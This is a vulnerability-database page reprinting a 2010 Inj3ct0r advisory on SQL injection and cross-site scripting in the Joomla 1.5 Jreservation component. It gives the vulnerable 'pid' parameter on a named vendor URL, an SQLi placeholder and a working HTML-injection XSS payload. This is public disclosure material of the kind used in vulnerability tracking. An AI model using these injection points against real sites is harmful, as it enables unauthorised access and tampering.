Vulners
Lucene search
Joomla 1.5 Jreservation Cross Site Scripting / SQL Injection
` ============================================================
Joomla 1.5 Jreservation Component SQLi And XSS Vulnerability
============================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ########################################## 1
0 I'm Sid3^effects member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Name : Joomla 1.5 Jreservation Component SQLi And XSS Vulnerability
Date : june, 9 2010
Vendor url :http://jforjoomla.com/
Platform: Windows
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
greetz to :All ICW members.
###############################################################################################################
Description:
Joomla 1.5 Jreservation Component for hotel booking system.
Jreservation is a specially designed component for hotel owners who provides lodging facility & online booking for the rooms like deluxe, Air conditioned, Non Air conditioned. By using this Joomla 1.5 Jreservation component you can add multiple room types, amenity types like room amenity or property amenity. Amenity are like additional services which the hotel owner provides with the room e.g. Telephone, internet connection, cable connection and property amenity like swimming pool, gym, etc. With the help of a calender the user or a customer of the hotel can check rooms availability also book room as a provisional booking.
Features of Joomla 1.5 Jreservation component :-
1.Native Joomla 1.5
2.Multiple properties are supported.
2.Admin can add / edit rooms/ room types
3 Admin can add / edit rooms/ rooms.
4.Admin can add / edit room amenities/ Property amenities.
5.Detailed search for user to search for available rooms.
4.Hotel owner can show hotel images in a slideshow.
5.Owner can upload multiple images to the admin.
6.Owner can add multiple rooms,room type, room rent in an easy way.
###############################################################################################################
Xploit: SQLi Vulnerability
DEMO URL:
http://jforjoomla.com/cd-hotel/Property-Cpanel.html?pid=[SQLi]
###############################################################################################################
Xploit: XSS Vulnerability
DEMO URL :
http://jforjoomla.com/cd-hotel/Property-Cpanel.html?pid=">><marquee><h1>XSS3d By Sid3^effects</h1><marquee>
###############################################################################################################
# 0day no more
# Sid3^effects
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Jun 2010 00:00Current
0.2Low risk
Vulners AI Score0.2